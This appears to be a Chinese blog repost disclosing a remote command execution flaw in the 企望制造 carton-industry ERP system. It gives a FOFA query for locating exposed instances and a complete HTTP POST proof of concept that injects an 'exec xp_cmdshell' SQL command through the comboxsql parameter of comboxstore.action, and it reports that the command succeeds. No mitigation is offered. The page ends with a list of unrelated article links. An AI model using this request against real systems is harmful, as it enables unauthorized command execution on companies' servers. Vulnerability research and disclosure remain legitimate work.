当前位置: 首页 > article >正文

企望制造ERP系统存在RCE漏洞

article 2024/11/21 1:44:05

漏洞描述

企望制造纸箱业erp系统由深知纸箱行业特点和业务流程的多位IT专家打造,具有国际先进的管理方式,将现代化的管理方式融入erp软件中,让企业分分钟就拥有科学的管理经验。erp的功能包括成本核算、报价定价、订单下达、生产下单、现场管理等多种功能。

漏洞复现

FOFA

title="企望制造ERP系统"

POC

POST /mainFunctions/comboxstore.action HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

bp 成功执行命令


http://www.kler.cn/a/330016.html

相关文章:

  • Flink是如何实现 End-To-End Exactly-once的?
  • Docker入门之Windows安装Docker初体验
  • Chrome 浏览器 131 版本新特性
  • IDEA2023 SpringBoot整合Web开发(二)
  • ### 哋它亢在5G基站中的应用:新兴技术与未来通信的融合
  • sqli—labs靶场 5-8关 (每日4关练习)持续更新!!!
  • UniVue大版本更新:UniVue2.0.0-preview
  • 10月2日笔记(内网资源探测篇)
  • 前端的全栈混合之路Meteor篇:运行在浏览器端的数据库-MiniMongo介绍及其前后端数据实时同步示例
  • 矩阵系统源码搭建,OEM贴牌,源头技术开发
  • 前端的全栈混合之路Meteor篇:3.0新版本介绍
  • vscode使用yarn 启动vue项目记录
  • 一个好用的服务治理组件Sentinel
  • 利士策分享,行走•悟世•惜福: 旅行真谛
  • nginx常用的性能优化
  • Custom C++ and CUDA Extensions - PyTorch
  • 外部引入的 JavaScript 放置位置
  • SpringBoot 源码解读与自动装配原理结合Actuator讲解
  • 汽车发动机系统(ems)详细解析
  • 01.useStateWithLabel
  • Mybatis-Flex使用
  • MybatisPlus代码生成器的使用
  • linux kernel Gdb在线调试
  • 【论文笔记】Visual Instruction Tuning
  • 操作系统_名词_文件下载_反弹SHELL_防火墙绕过
  • Junit和枚举ENUM